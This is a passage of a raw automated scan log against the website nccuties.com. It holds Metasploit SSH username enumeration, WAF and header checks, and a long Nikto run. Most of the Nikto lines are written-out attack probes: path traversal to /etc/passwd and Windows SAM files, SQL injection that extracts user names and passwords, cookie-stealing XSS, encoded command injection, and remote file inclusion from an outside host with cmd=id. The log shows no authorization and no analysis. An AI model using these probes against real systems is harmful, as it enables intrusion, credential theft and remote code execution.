  669. [-] 216.250.120.114:22 - SSH - User 'mysql' on could not connect
  670. [-] 216.250.120.114:22 - SSH - User 'nobody' not found
  671. [-] 216.250.120.114:22 - SSH - User 'oracle' not found
  672. [-] 216.250.120.114:22 - SSH - User 'owaspbwa' not found
  673. [-] 216.250.120.114:22 - SSH - User 'postfix' not found
  674. [-] 216.250.120.114:22 - SSH - User 'postgres' not found
  675. [-] 216.250.120.114:22 - SSH - User 'private' on could not connect
  676. [-] 216.250.120.114:22 - SSH - User 'proftpd' on could not connect
  677. [-] 216.250.120.114:22 - SSH - User 'public' on could not connect
  678. [-] 216.250.120.114:22 - SSH - User 'root' not found
  679. [-] 216.250.120.114:22 - SSH - User 'superadmin' on could not connect
  680. [-] 216.250.120.114:22 - SSH - User 'support' on could not connect
  681. [-] 216.250.120.114:22 - SSH - User 'sys' not found
  682. [-] 216.250.120.114:22 - SSH - User 'system' not found
  683. [-] 216.250.120.114:22 - SSH - User 'systemadmin' not found
  684. [-] 216.250.120.114:22 - SSH - User 'systemadministrator' on could not connect
  685. [-] 216.250.120.114:22 - SSH - User 'test' on could not connect
  686. [-] 216.250.120.114:22 - SSH - User 'tomcat' not found
  687. [-] 216.250.120.114:22 - SSH - User 'user' not found
  688. [-] 216.250.120.114:22 - SSH - User 'webmaster' not found
  689. [-] 216.250.120.114:22 - SSH - User 'www-data' not found
  690. [-] 216.250.120.114:22 - SSH - User 'Fortimanager_Access' not found
  691. [*] Scanned 1 of 1 hosts (100% complete)
  692. [*] Auxiliary module execution completed
  693. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
  694. [*] nccuties.com:22       - Scanned 1 of 1 hosts (100% complete)
  695. [*] Auxiliary module execution completed
  696.  + -- --=[Port 23 closed... skipping.
  697.  + -- --=[Port 25 closed... skipping.
  698.  + -- --=[Port 53 closed... skipping.
  699.  + -- --=[Port 79 closed... skipping.
  700.  + -- --=[Port 80 opened... running tests...
  701.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  702.  
  703.                                  ^     ^
  704.         _   __  _   ____ _   __  _    _   ____
  705.        ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  706.       | V V // o // _/ | V V // 0 // 0 // _/
  707.       |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
  708.                                 <
  709.                                  ...'
  710.  
  711.     WAFW00F - Web Application Firewall Detection Tool
  712.  
  713.     By Sandro Gauci && Wendel G. Henrique
  714.  
  715. Checking http://nccuties.com
  716. Generic Detection results:
  717. The site http://nccuties.com seems to be behind a WAF or some sort of security solution
  718. Reason: The server returned a different response code when a string trigged the blacklist.
  719. Normal response code is "404", while the response code to an attack is "503"
  720. Number of requests: 11
  721.  
  722.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  723. http://nccuties.com [200 OK] Apache, Country[UNITED STATES][US], Email[amy@nccuties.com], Frame, HTTPServer[Apache], IP[216.250.120.114], Script[JavaScript,text/javascript], Title[Welcome to NC Cuties]
  724.  
  725.    __  ______ _____ 
  726.    \ \/ / ___|_   _|
  727.     \  /\___ \ | |  
  728.     /  \ ___) || |  
  729.    /_/\_|____/ |_|  
  730.  
  731. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  732. + -- --=[Target: nccuties.com:80
  733. + -- --=[Site not vulnerable to Cross-Site Tracing!
  734. + -- --=[Site not vulnerable to Host Header Injection!
  735. + -- --=[Site vulnerable to Cross-Frame Scripting!
  736. + -- --=[Site vulnerable to Clickjacking!
  737.  
  738. HTTP/1.1 405 Not Allowed
  739. Server: nginx
  740. Date: Mon, 16 Oct 2017 22:46:17 GMT
  741. Content-Type: text/html
  742. Content-Length: 166
  743. Connection: close
  744.  
  745. <html>
  746. <head><title>405 Not Allowed</title></head>
  747. <body bgcolor="white">
  748. <center><h1>405 Not Allowed</h1></center>
  749. <hr><center>nginx</center>
  750. </body>
  751. </html>
  752. 
  753. HTTP/1.1 200 OK
  754. Content-Type: text/html
  755. Content-Length: 26659
  756. Connection: keep-alive
  757. Keep-Alive: timeout=15
  758. Date: Mon, 16 Oct 2017 22:46:18 GMT
  759. Server: Apache
  760. Last-Modified: Sun, 26 Oct 2014 18:32:10 GMT
  761. ETag: "6823-50657a1cdd0d5"
  762. Accept-Ranges: bytes
  763.  
  764. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  765. <html xmlns="http://www.w3.org/1999/xhtml">
  766.  
  767. <head>
  768.     <meta http-equiv="Content-Language" content="en-us">
  769.     <title>Welcome to NC Cuties</title>
  770.     <script language="JavaScript">
  771.             image1 = new Image();
  772.             image1.src = "http://www.nccuties.com/gr/links2.gif";
  773.             image2 = new Image();
  774.             image2.src = "http://www.nccuties.com/gr/stuff2.gif";
  775.             image3 = new Image();
  776.             image3.src = "http://www.nccuties.com/gr/contact2.gif";
  777.         </script>
  778.     <link rel="stylesheet" type="text/css" href="http://www.nccuties.com/style.css">
  779.     <link rel="icon"
  780.       type="image/png"
  781.       href="http://www.nccuties.com/gr/ncc.png">
  782. </head>
  783.  
  784. 
  785.  
  786.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  787. + -- --=[Checking if X-Content options are enabled on nccuties.com... 
  788.  
  789. + -- --=[Checking if X-Frame options are enabled on nccuties.com... 
  790.  
  791. + -- --=[Checking if X-XSS-Protection header is enabled on nccuties.com... 
  792.  
  793. + -- --=[Checking HTTP methods on nccuties.com... 
  794. Allow: POST,OPTIONS,GET,HEAD
  795.  
  796. + -- --=[Checking if TRACE method is enabled on nccuties.com... 
  797.  
  798. + -- --=[Checking for META tags on nccuties.com... 
  799.     <meta http-equiv="Content-Language" content="en-us">
  800.  
  801. + -- --=[Checking for open proxy on nccuties.com... 
  802. <html><head>
  803. <title>403 Forbidden</title>
  804. </head><body>
  805. <h1>Forbidden</h1>
  806. <p>You don't have permission to access /
  807. on this server.<br />
  808. </p>
  809. <p>Additionally, a 404 Not Found
  810. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  811. </body></html>
  812.  
  813. + -- --=[Enumerating software on nccuties.com... 
  814. Server: Apache
  815.  
  816. + -- --=[Checking if Strict-Transport-Security is enabled on nccuties.com... 
  817.  
  818. + -- --=[Checking for Flash cross-domain policy on nccuties.com... 
  819.                     '<script type="text/javascript" language="JavaScript"'
  820.                             + 'src="//sedoparking.com/frmpark/'
  821.                             + window.location.host + '/'
  822.                             + '1und1parking4'
  823.                             + '/park.js">'
  824.                     + '<\/script>'
  825.             );
  826.         </script>
  827.     </body>
  828. </html>
  829. + -- --=[Checking for Silverlight cross-domain policy on nccuties.com... 
  830.                     '<script type="text/javascript" language="JavaScript"'
  831.                             + 'src="//sedoparking.com/frmpark/'
  832.                             + window.location.host + '/'
  833.                             + '1und1parking4'
  834.                             + '/park.js">'
  835.                     + '<\/script>'
  836.             );
  837.         </script>
  838.     </body>
  839. </html>
  840. + -- --=[Checking for HTML5 cross-origin resource sharing on nccuties.com... 
  841.  
  842. + -- --=[Retrieving robots.txt on nccuties.com... 
  843.                     '<script type="text/javascript" language="JavaScript"'
  844.                             + 'src="//sedoparking.com/frmpark/'
  845.                             + window.location.host + '/'
  846.                             + '1und1parking4'
  847.                             + '/park.js">'
  848.                     + '<\/script>'
  849.             );
  850.         </script>
  851.     </body>
  852. </html>
  853. + -- --=[Retrieving sitemap.xml on nccuties.com... 
  854.                     '<script type="text/javascript" language="JavaScript"'
  855.                             + 'src="//sedoparking.com/frmpark/'
  856.                             + window.location.host + '/'
  857.                             + '1und1parking4'
  858.                             + '/park.js">'
  859.                     + '<\/script>'
  860.             );
  861.         </script>
  862.     </body>
  863. </html>
  864. + -- --=[Checking cookie attributes on nccuties.com... 
  865.  
  866. + -- --=[Checking for ASP.NET Detailed Errors on nccuties.com... 
  867.  
  868. 
  869.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  870. - Nikto v2.1.6
  871. ---------------------------------------------------------------------------
  872. + Target IP:          216.250.120.114
  873. + Target Hostname:    nccuties.com
  874. + Target Port:        80
  875. + Start Time:         2017-10-16 18:46:32 (GMT-4)
  876. ---------------------------------------------------------------------------
  877. + Server: Apache
  878. + Server leaks inodes via ETags, header found with file /, fields: 0x6823 0x50657a1cdd0d5
  879. + The anti-clickjacking X-Frame-Options header is not present.
  880. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  881. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  882. + /.jik24jpS: The mod_speling module can reveal otherwise 'hidden' files in directories.
  883. + /index.php?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  884. + No CGI Directories found (use '-C all' to force check all possible dirs)
  885. + /index.php: The mod_speling module can reveal otherwise 'hidden' files in directories.
  886. + /index.php3: The mod_speling module can reveal otherwise 'hidden' files in directories.
  887. + /index.cfm: The mod_speling module can reveal otherwise 'hidden' files in directories.
  888. + /index.cgi: The mod_speling module can reveal otherwise 'hidden' files in directories.
  889. + /index.pl: The mod_speling module can reveal otherwise 'hidden' files in directories.
  890. + /index.asp: The mod_speling module can reveal otherwise 'hidden' files in directories.
  891. + /index.aspx: The mod_speling module can reveal otherwise 'hidden' files in directories.
  892. + /index.do: The mod_speling module can reveal otherwise 'hidden' files in directories.
  893. + /index.xml: The mod_speling module can reveal otherwise 'hidden' files in directories.
  894. + /home.asp: The mod_speling module can reveal otherwise 'hidden' files in directories.
  895. + Server banner has changed from 'Apache' to 'nginx' which may suggest a WAF, load balancer or proxy is in place
  896. + Uncommon header 'tcn' found, with contents: list
  897. + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
  898. + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
  899. + /index.html.bak: The mod_speling module can reveal otherwise 'hidden' files in directories.
  900. + /index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc: The mod_speling module can reveal otherwise 'hidden' files in directories.
  901. + /index.php/123: The mod_speling module can reveal otherwise 'hidden' files in directories.
  902. + /home.php?arsc_language=elvish: The mod_speling module can reveal otherwise 'hidden' files in directories.
  903. + /index.php?file=index.php: The mod_speling module can reveal otherwise 'hidden' files in directories.
  904. + /.perf: The mod_speling module can reveal otherwise 'hidden' files in directories.
  905. + /%5c/: The mod_speling module can reveal otherwise 'hidden' files in directories.
  906. + /c/winnt/system32/cmd.exe?/c+dir+/OG: The mod_speling module can reveal otherwise 'hidden' files in directories.
  907. + /................../config.sys: The mod_speling module can reveal otherwise 'hidden' files in directories.
  908. + /..\\..\\..\\..\\..\\..\\..\\boot.ini: The mod_speling module can reveal otherwise 'hidden' files in directories.
  909. + /.cobalt/sysManage/../admin/.htaccess: The mod_speling module can reveal otherwise 'hidden' files in directories.
  910. + /index.php?download=/winnt/win.ini: The mod_speling module can reveal otherwise 'hidden' files in directories.
  911. + /index.php?download=/windows/win.ini: The mod_speling module can reveal otherwise 'hidden' files in directories.
  912. + /index.php?download=/etc/passwd: The mod_speling module can reveal otherwise 'hidden' files in directories.
  913. + /index.php?|=../../../../../../../../../etc/passwd: The mod_speling module can reveal otherwise 'hidden' files in directories.
  914. + /index.php?page=../../../../../../../../../../etc/passwd: The mod_speling module can reveal otherwise 'hidden' files in directories.
  915. + /index.php?page=../../../../../../../../../../boot.ini: The mod_speling module can reveal otherwise 'hidden' files in directories.
  916. + /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd: The mod_speling module can reveal otherwise 'hidden' files in directories.
  917. + /k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor: The mod_speling module can reveal otherwise 'hidden' files in directories.
  918. + /..\..\..\..\..\..\temp\temp.class: The mod_speling module can reveal otherwise 'hidden' files in directories.
  919. + /................../etc/passwd: The mod_speling module can reveal otherwise 'hidden' files in directories.
  920. + /index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*: The mod_speling module can reveal otherwise 'hidden' files in directories.
  921. + /index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : The mod_speling module can reveal otherwise 'hidden' files in directories.
  922. + /index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;: The mod_speling module can reveal otherwise 'hidden' files in directories.
  923. + /index.php?sql_debug=1: The mod_speling module can reveal otherwise 'hidden' files in directories.
  924. + /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: The mod_speling module can reveal otherwise 'hidden' files in directories.
  925. + /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd: The mod_speling module can reveal otherwise 'hidden' files in directories.
  926. + /index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527: The mod_speling module can reveal otherwise 'hidden' files in directories.
  927. + /index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527: The mod_speling module can reveal otherwise 'hidden' files in directories.
  928. + /index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527: The mod_speling module can reveal otherwise 'hidden' files in directories.
  929. + /index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527: The mod_speling module can reveal otherwise 'hidden' files in directories.
  930. + /index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527: The mod_speling module can reveal otherwise 'hidden' files in directories.
  931. + /index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527: The mod_speling module can reveal otherwise 'hidden' files in directories.
  932. + /index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527: The mod_speling module can reveal otherwise 'hidden' files in directories.
  933. + /index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527: The mod_speling module can reveal otherwise 'hidden' files in directories.
  934. + /index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527: The mod_speling module can reveal otherwise 'hidden' files in directories.
  935. + /index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527: The mod_speling module can reveal otherwise 'hidden' files in directories.
  936. + /index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]: The mod_speling module can reveal otherwise 'hidden' files in directories.
  937. + /index.php?offset=[%20Problem%20Here%20]: The mod_speling module can reveal otherwise 'hidden' files in directories.
  938. + /.psql_history: The mod_speling module can reveal otherwise 'hidden' files in directories.
  939. + /c/: The mod_speling module can reveal otherwise 'hidden' files in directories.
  940. + OSVDB-3092: /img/: This might be interesting...
  941. + /index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20: The mod_speling module can reveal otherwise 'hidden' files in directories.
  942. + /.wwwacl: The mod_speling module can reveal otherwise 'hidden' files in directories.
  943. + /.www_acl: The mod_speling module can reveal otherwise 'hidden' files in directories.
  944. + /.access: The mod_speling module can reveal otherwise 'hidden' files in directories.
  945. + /.addressbook: The mod_speling module can reveal otherwise 'hidden' files in directories.
  946. + /.bashrc: The mod_speling module can reveal otherwise 'hidden' files in directories.
  947. + /.bash_history: The mod_speling module can reveal otherwise 'hidden' files in directories.
  948. + /.forward: The mod_speling module can reveal otherwise 'hidden' files in directories.
  949. + /.history: The mod_speling module can reveal otherwise 'hidden' files in directories.
  950. + /.lynx_cookies: The mod_speling module can reveal otherwise 'hidden' files in directories.
  951. + /.mysql_history: The mod_speling module can reveal otherwise 'hidden' files in directories.
  952. + /.passwd: The mod_speling module can reveal otherwise 'hidden' files in directories.
  953. + /.pinerc: The mod_speling module can reveal otherwise 'hidden' files in directories.
  954. + /.plan: The mod_speling module can reveal otherwise 'hidden' files in directories.
  955. + /.proclog: The mod_speling module can reveal otherwise 'hidden' files in directories.
  956. + /.procmailrc: The mod_speling module can reveal otherwise 'hidden' files in directories.
  957. + /.profile: The mod_speling module can reveal otherwise 'hidden' files in directories.
  958. + /.rhosts: The mod_speling module can reveal otherwise 'hidden' files in directories.
  959. + /.sh_history: The mod_speling module can reveal otherwise 'hidden' files in directories.
  960. + /index.html.ca: The mod_speling module can reveal otherwise 'hidden' files in directories.
  961. + /index.html.cz.iso8859-2: The mod_speling module can reveal otherwise 'hidden' files in directories.
  962. + /index.html.de: The mod_speling module can reveal otherwise 'hidden' files in directories.
  963. + /index.html.dk: The mod_speling module can reveal otherwise 'hidden' files in directories.
  964. + /index.html.ee: The mod_speling module can reveal otherwise 'hidden' files in directories.
  965. + /index.html.el: The mod_speling module can reveal otherwise 'hidden' files in directories.
  966. + /index.html.en: The mod_speling module can reveal otherwise 'hidden' files in directories.
  967. + /index.html.es: The mod_speling module can reveal otherwise 'hidden' files in directories.
  968. + /index.html.et: The mod_speling module can reveal otherwise 'hidden' files in directories.
  969. + /index.html.fr: The mod_speling module can reveal otherwise 'hidden' files in directories.
  970. + /index.html.he.iso8859-8: The mod_speling module can reveal otherwise 'hidden' files in directories.
  971. + /index.html.hr.iso8859-2: The mod_speling module can reveal otherwise 'hidden' files in directories.
  972. + /index.html.it: The mod_speling module can reveal otherwise 'hidden' files in directories.
  973. + /index.html.ja.iso2022-jp: The mod_speling module can reveal otherwise 'hidden' files in directories.
  974. + /index.html.kr.iso2022-kr: The mod_speling module can reveal otherwise 'hidden' files in directories.
  975. + /index.html.ltz.utf8: The mod_speling module can reveal otherwise 'hidden' files in directories.
  976. + /index.html.lu.utf8: The mod_speling module can reveal otherwise 'hidden' files in directories.
  977. + /index.html.nl: The mod_speling module can reveal otherwise 'hidden' files in directories.
  978. + /index.html.nn: The mod_speling module can reveal otherwise 'hidden' files in directories.
  979. + /index.html.no: The mod_speling module can reveal otherwise 'hidden' files in directories.
  980. + /index.html.po.iso8859-2: The mod_speling module can reveal otherwise 'hidden' files in directories.
  981. + /index.html.pt: The mod_speling module can reveal otherwise 'hidden' files in directories.
  982. + /index.html.pt-br: The mod_speling module can reveal otherwise 'hidden' files in directories.
  983. + /index.html.ru.cp-1251: The mod_speling module can reveal otherwise 'hidden' files in directories.
  984. + /index.html.ru.cp866: The mod_speling module can reveal otherwise 'hidden' files in directories.
  985. + /index.html.ru.iso-ru: The mod_speling module can reveal otherwise 'hidden' files in directories.
  986. + /index.html.ru.koi8-r: The mod_speling module can reveal otherwise 'hidden' files in directories.
  987. + /index.html.ru.utf8: The mod_speling module can reveal otherwise 'hidden' files in directories.
  988. + /index.html.se: The mod_speling module can reveal otherwise 'hidden' files in directories.
  989. + /index.html.tw: The mod_speling module can reveal otherwise 'hidden' files in directories.
  990. + /index.html.tw.Big5: The mod_speling module can reveal otherwise 'hidden' files in directories.
  991. + /index.html.var: The mod_speling module can reveal otherwise 'hidden' files in directories.
  992. + /a/: The mod_speling module can reveal otherwise 'hidden' files in directories.
  993. + /.%252e/.%252e/.%252e/winnt/boot.ini: The mod_speling module can reveal otherwise 'hidden' files in directories.
  994. + /.nsconfig: The mod_speling module can reveal otherwise 'hidden' files in directories.
  995. + /.FBCIndex: The mod_speling module can reveal otherwise 'hidden' files in directories.
  996. + /..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini: The mod_speling module can reveal otherwise 'hidden' files in directories.
  997. + /..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini: The mod_speling module can reveal otherwise 'hidden' files in directories.
  998. + /.DS_Store: The mod_speling module can reveal otherwise 'hidden' files in directories.
  999. + /..%252f..%252f..%252f..%252f..%252f../windows/repair/sam: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1000. + /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1001. + /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1002. + /..%255c..%255c..%255c..%255c..%255c../windows/repair/sam: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1003. + /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1004. + /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1005. + /home.php?a=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1006. + /home.php?page=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1007. + /home.php?pagina=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1008. + /index.php3?Application_Root=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1009. + /index.php?1=lol&PAGES[lol]=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1010. + /index.php?AML_opensite=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1011. + /index.php?AMV_openconfig=1&AMV_serverpath=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1012. + /index.php?CONFIG[MWCHAT_Libs]=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1013. + /index.php?ConfigDir=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1014. + /index.php?DIR_PLUGINS=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1015. + /index.php?G_JGALL[inc_path]=http://cirt.net/rfiinc.txt?%00: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1016. + /index.php?HomeDir=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1017. + /index.php?Lang=AR&Page=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1018. + /index.php?Madoa=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1019. + /index.php?RP_PATH=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1020. + /index.php?abg_path=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1021. + /index.php?abs_path=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1022. + /index.php?abs_path=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1023. + /index.php?adduser=true&lang=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1024. + /index.php?adodb=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1025. + /index.php?ads_file=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1026. + /index.php?arquivo=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1027. + /index.php?back=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1028. + /index.php?base==http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1029. + /index.php?basePath=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1030. + /index.php?bibtexrootrel=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1031. + /index.php?blog_dc_path=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1032. + /index.php?blog_theme=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1033. + /index.php?body=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1034. + /index.php?class_path=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1035. + /index.php?classified_path=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1036. + /index.php?cms=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1037. + /index.php?config[\"sipssys\"]=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1038. + /index.php?config[root_ordner]=http://cirt.net/rfiinc.txt??&cmd=id: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1039. + /index.php?config[root_ordner]=http://cirt.net/rfiinc.txt??cmd=id: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1040. + /index.php?config_atkroot=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1041. + /index.php?configuration=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1042. + /index.php?custom_admin_path=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1043. + /index.php?dateiPfad=http://cirt.net/rfiinc.txt??&cmd=ls: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1044. + /index.php?de=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1045. + /index.php?dept=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1046. + /index.php?do=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1047. + /index.php?exec=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1048. + /index.php?ext=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1049. + /index.php?faq_path=http://cirt.net/rfiinc.txt??&cmd=id: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1050. + /index.php?file_name[]=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1051. + /index.php?file_Nikto[]=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1052. + /index.php?file_path=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1053. + /index.php?fileloc=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1054. + /index.php?from=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1055. + /index.php?func=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1056. + /index.php?function=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1057. + /index.php?function=custom&custom=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1058. + /index.php?gOo=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1059. + /index.php?gen=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1060. + /index.php?get=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1061. + /index.php?home_name=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1062. + /index.php?home_Nikto=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1063. + /index.php?ilang=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1064. + /index.php?inc_dir=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1065. + /index.php?inc_dir=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1066. + /index.php?includeDir=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1067. + /index.php?includeFooter=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
